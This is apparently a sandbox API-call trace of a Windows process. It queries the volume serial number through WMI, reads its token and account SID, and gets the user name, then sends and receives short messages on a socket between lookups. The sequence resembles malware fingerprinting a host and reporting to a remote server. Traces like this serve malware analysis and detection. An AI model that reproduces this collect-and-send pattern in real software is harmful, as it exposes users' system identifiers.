	[0258.778] WbemDefPath:IUnknown:AddRef (This=0x635e0a0) returned 0x2
	[0258.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x5dee5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5bc | out: ppvObject=0x5dee5bc*=0x635e0a0) returned 0x0
	[0258.778] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x2
	[0258.778] WbemDefPath:IUnknown:AddRef (This=0x635e0a0) returned 0x3
	[0258.778] WbemDefPath:IWbemPath:SetText (This=0x635e0a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0258.778] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x2
	[0258.778] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee724 | out: puCount=0x5dee724*=0x2) returned 0x0
	[0258.778] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee720*=0x0, pszText=0x0 | out: puBuffLength=0x5dee720*=0x17, pszText=0x0) returned 0x0
	[0258.779] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee720*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee720*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.779] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0258.779] IUnknown:AddRef (This=0x635decc) returned 0x3
	[0258.779] IEnumWbemClassObject:Next (in: This=0x635decc, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x311d52c | out: apObjects=0x769e88*=0x0, puReturned=0x311d52c*=0x0) returned 0x1
	[0258.802] IUnknown:Release (This=0x635decc) returned 0x2
	[0258.802] CoGetContextToken (in: pToken=0x5dee5f4 | out: pToken=0x5dee5f4) returned 0x0
	[0258.802] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x1
	[0258.803] IUnknown:Release (This=0x635decc) returned 0x0
	[0258.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0258.810] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0258.810] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.810] IWbemClassObject:Get (in: This=0x635df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311e9e0*=0, plFlavor=0x311e9e4*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x311e9e0*=8, plFlavor=0x311e9e4*=64) returned 0x0
	[0258.810] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.810] IWbemClassObject:Get (in: This=0x635df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311e9e0*=8, plFlavor=0x311e9e4*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x311e9e0*=8, plFlavor=0x311e9e4*=64) returned 0x0
	[0258.810] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0258.810] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0258.810] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.811] IWbemClassObject:Get (in: This=0x635df08, wszName="__CLASS", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311ea98*=0, plFlavor=0x311ea9c*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x311ea98*=8, plFlavor=0x311ea9c*=64) returned 0x0
	[0258.811] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.811] IWbemClassObject:Get (in: This=0x635df08, wszName="__CLASS", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311ea98*=8, plFlavor=0x311ea9c*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x311ea98*=8, plFlavor=0x311ea9c*=64) returned 0x0
	[0258.811] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.811] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0258.811] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0258.811] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.811] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0258.811] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0258.811] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.811] IWbemClassObject:GetNames (in: This=0x635df08, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5dee74c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5dee718 | out: pNames=0x5dee718*="\x01ƀ\x04") returned 0x0
	[0258.811] SafeArrayGetDim (psa=0x7f8538) returned 0x1
	[0258.811] SafeArrayGetDim (psa=0x7f8538) returned 0x1
	[0258.811] SafeArrayGetLBound (in: psa=0x7f8538, nDim=0x1, plLbound=0x5dee314 | out: plLbound=0x5dee314) returned 0x0
	[0258.812] IWbemClassObject:Get (in: This=0x635df08, wszName="__GENUS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f330*=0, plFlavor=0x311f334*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x311f330*=3, plFlavor=0x311f334*=64) returned 0x0
	[0258.812] IWbemClassObject:Get (in: This=0x635df08, wszName="__CLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f364*=0, plFlavor=0x311f368*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x311f364*=8, plFlavor=0x311f368*=64) returned 0x0
	[0258.812] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0258.812] IWbemClassObject:Get (in: This=0x635df08, wszName="__SUPERCLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f3b8*=0, plFlavor=0x311f3bc*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x311f3b8*=8, plFlavor=0x311f3bc*=64) returned 0x0
	[0258.812] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0258.812] IWbemClassObject:Get (in: This=0x635df08, wszName="__DYNASTY", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f414*=0, plFlavor=0x311f418*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x311f414*=8, plFlavor=0x311f418*=64) returned 0x0
	[0258.812] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0258.813] IWbemClassObject:Get (in: This=0x635df08, wszName="__RELPATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f480*=0, plFlavor=0x311f484*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x311f480*=8, plFlavor=0x311f484*=64) returned 0x0
	[0258.813] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0258.813] IWbemClassObject:Get (in: This=0x635df08, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f554*=0, plFlavor=0x311f558*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x311f554*=3, plFlavor=0x311f558*=64) returned 0x0
	[0258.813] IWbemClassObject:Get (in: This=0x635df08, wszName="__DERIVATION", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f588*=0, plFlavor=0x311f58c*=0 | out: pVal=0x5dee744*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7f8538*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x7b3b08, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x311f588*=8200, plFlavor=0x311f58c*=64) returned 0x0
	[0258.813] IWbemClassObject:Get (in: This=0x635df08, wszName="__SERVER", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f6ec*=0, plFlavor=0x311f6f0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x311f6ec*=8, plFlavor=0x311f6f0*=64) returned 0x0
	[0258.814] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0258.814] IWbemClassObject:Get (in: This=0x635df08, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f738*=0, plFlavor=0x311f73c*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x311f738*=8, plFlavor=0x311f73c*=64) returned 0x0
	[0258.814] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0258.814] IWbemClassObject:Get (in: This=0x635df08, wszName="__PATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f788*=0, plFlavor=0x311f78c*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x311f788*=8, plFlavor=0x311f78c*=64) returned 0x0
	[0258.814] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee7c4 | out: puCount=0x5dee7c4*=0x2) returned 0x0
	[0258.814] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee7c0*=0x0, pszText=0x0 | out: puBuffLength=0x5dee7c0*=0x17, pszText=0x0) returned 0x0
	[0258.814] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee7c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee7c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.814] IWbemClassObject:Get (in: This=0x635df08, wszName="SerialNumber", lFlags=0, pVal=0x5dee780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f8dc*=0, plFlavor=0x311f8e0*=0 | out: pVal=0x5dee780*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x311f8dc*=19, plFlavor=0x311f8e0*=0) returned 0x0
	[0258.815] IWbemClassObject:Get (in: This=0x635df08, wszName="SerialNumber", lFlags=0, pVal=0x5dee838*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x311f8dc*=19, plFlavor=0x311f8e0*=0 | out: pVal=0x5dee838*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x311f8dc*=19, plFlavor=0x311f8e0*=0) returned 0x0
	[0258.820] send (s=0x420, buf=0x31204a0*, len=36, flags=0) returned 36
	[0258.820] GetLastError () returned 0x0
	[0258.835] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 88
	[0259.223] GetLastError () returned 0x0
	[0259.233] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0259.234] send (s=0x420, buf=0x312b9d8*, len=34, flags=0) returned 34
	[0259.234] GetLastError () returned 0x0
	[0259.234] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 121
	[0260.230] GetLastError () returned 0x0
	[0260.231] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0260.408] GetCurrentProcess () returned 0xffffffff
	[0260.408] GetLastError () returned 0x3f0
	[0260.408] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee6d8 | out: TokenHandle=0x5dee6d8*=0x4fc) returned 1
	[0260.408] GetLastError () returned 0x3f0
	[0260.433] GetCurrentProcess () returned 0xffffffff
	[0260.433] GetLastError () returned 0x3f0
	[0260.433] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee7cc | out: TokenHandle=0x5dee7cc*=0x500) returned 1
	[0260.433] GetLastError () returned 0x3f0
	[0260.434] GetTokenInformation (in: TokenHandle=0x4fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5dee874 | out: TokenInformation=0x0, ReturnLength=0x5dee874) returned 0
	[0260.434] GetLastError () returned 0x7a
	[0260.434] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x7f8588
	[0260.434] GetLastError () returned 0x7a
	[0260.434] GetTokenInformation (in: TokenHandle=0x4fc, TokenInformationClass=0x1, TokenInformation=0x7f8588, TokenInformationLength=0x24, ReturnLength=0x5dee874 | out: TokenInformation=0x7f8588, ReturnLength=0x5dee874) returned 1
	[0260.434] GetLastError () returned 0x7a
	[0260.437] LocalFree (hMem=0x7f8588) returned 0x0
	[0260.437] GetLastError () returned 0x7f
	[0260.451] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x5dee740, DesiredAccess=0x800, PolicyHandle=0x5dee6e8 | out: PolicyHandle=0x5dee6e8) returned 0x0
	[0260.452] GetLastError () returned 0x0
	[0260.454] LsaLookupSids (in: PolicyHandle=0x63958d8, Count=0x1, Sids=0x3140248*=0x31401e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x5dee710, Names=0x5dee704 | out: ReferencedDomains=0x5dee710, Names=0x5dee704) returned 0x0
	[0260.456] GetLastError () returned 0x0
	[0260.457] LsaClose (ObjectHandle=0x63958d8) returned 0x0
	[0260.457] GetLastError () returned 0x0
	[0260.457] LsaFreeMemory (Buffer=0x7d9360) returned 0x0
	[0260.457] GetLastError () returned 0x0
	[0260.457] LsaFreeMemory (Buffer=0x7ef568) returned 0x0
	[0260.457] GetLastError () returned 0x0
	[0260.458] send (s=0x420, buf=0x3140a6c*, len=49, flags=0) returned 49
	[0260.458] GetLastError () returned 0x0
	[0260.458] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 91
	[0261.205] GetLastError () returned 0x0
	[0261.206] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0261.212] GetUserNameW (in: lpBuffer=0x7da200, pcbBuffer=0x5dee8c0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x5dee8c0) returned 1
	[0261.213] send (s=0x420, buf=0x314b3f4*, len=43, flags=0) returned 43
	[0261.213] GetLastError () returned 0x0
	[0261.213] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 108
	[0262.238] GetLastError () returned 0x0
	[0262.239] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0262.249] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee70c | out: ppv=0x5dee70c*=0x718dec) returned 0x0
	[0262.250] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee704 | out: pAptType=0x5dee704*=1) returned 0x0
	[0262.250] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee708 | out: ppvObject=0x5dee708*=0x0) returned 0x80004002
	[0262.250] IUnknown:Release (This=0x718dec) returned 0x1
	[0262.250] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee224 | out: ppv=0x5dee224*=0x635cb70) returned 0x0
	[0262.250] WbemDefPath:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee054 | out: ppvObject=0x5dee054*=0x0) returned 0x80004002
	[0262.254] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee08c | out: ppvObject=0x5dee08c*=0x635de40) returned 0x0
	[0262.255] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede30 | out: ppvObject=0x5dede30*=0x635de40) returned 0x0
	[0262.255] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddec | out: ppvObject=0x5deddec*=0x0) returned 0x80004002
	[0262.255] WbemDefPath:IUnknown:AddRef (This=0x635de40) returned 0x3
	[0262.255] CoGetContextToken (in: pToken=0x5dedc78 | out: pToken=0x5dedc78) returned 0x0
	[0262.255] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc60 | out: ppvObject=0x5dedc60*=0x7ffbe8) returned 0x0
	[0262.256] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ffbe8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc68 | out: pCid=0x5dedc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.256] WbemDefPath:IUnknown:Release (This=0x7ffbe8) returned 0x3
	[0262.256] CoGetContextToken (in: pToken=0x5dedc70 | out: pToken=0x5dedc70) returned 0x0
	[0262.256] WbemDefPath:IUnknown:AddRef (This=0x635de40) returned 0x4
	[0262.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedce4 | out: ppvObject=0x5dedce4*=0x0) returned 0x80004002
	[0262.256] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x3
	[0262.256] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x2
	[0262.256] WbemDefPath:IUnknown:Release (This=0x635cb70) returned 0x0
	[0262.257] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x1
	[0262.257] CoGetContextToken (in: pToken=0x5dee520 | out: pToken=0x5dee520) returned 0x0
	[0262.257] CoGetContextToken (in: pToken=0x5dee4e0 | out: pToken=0x5dee4e0) returned 0x0
	[0262.257] WbemDefPath:IUnknown:AddRef (This=0x635de40) returned 0x2
	[0262.257] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x5dee55c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee558 | out: ppvObject=0x5dee558*=0x635de40) returned 0x0
	[0262.257] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x2
	[0262.257] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x1
	[0262.257] CoGetContextToken (in: pToken=0x5dee5a0 | out: pToken=0x5dee5a0) returned 0x0
	[0262.257] CoGetContextToken (in: pToken=0x5dee560 | out: pToken=0x5dee560) returned 0x0
	[0262.257] WbemDefPath:IUnknown:AddRef (This=0x635de40) returned 0x2
	[0262.258] WbemDefPath:IUnknown:QueryInterface (in: This=0x635de40, riid=0x5dee5dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5d8 | out: ppvObject=0x5dee5d8*=0x635de40) returned 0x0
	[0262.258] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x2
	[0262.258] WbemDefPath:IUnknown:AddRef (This=0x635de40) returned 0x3
	[0262.258] WbemDefPath:IWbemPath:SetText (This=0x635de40, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.258] WbemDefPath:IUnknown:Release (This=0x635de40) returned 0x2
	[0262.258] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee744 | out: puCount=0x5dee744*=0x2) returned 0x0
	[0262.258] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee740*=0x0, pszText=0x0 | out: puBuffLength=0x5dee740*=0x17, pszText=0x0) returned 0x0
	[0262.258] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee740*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee740*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.258] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee740 | out: puCount=0x5dee740*=0x2) returned 0x0
	[0262.258] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee73c*=0x0, pszText=0x0 | out: puBuffLength=0x5dee73c*=0x17, pszText=0x0) returned 0x0
	[0262.258] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee73c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee73c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.258] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6bc | out: ppv=0x5dee6bc*=0x718dec) returned 0x0
	[0262.259] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6b4 | out: pAptType=0x5dee6b4*=1) returned 0x0
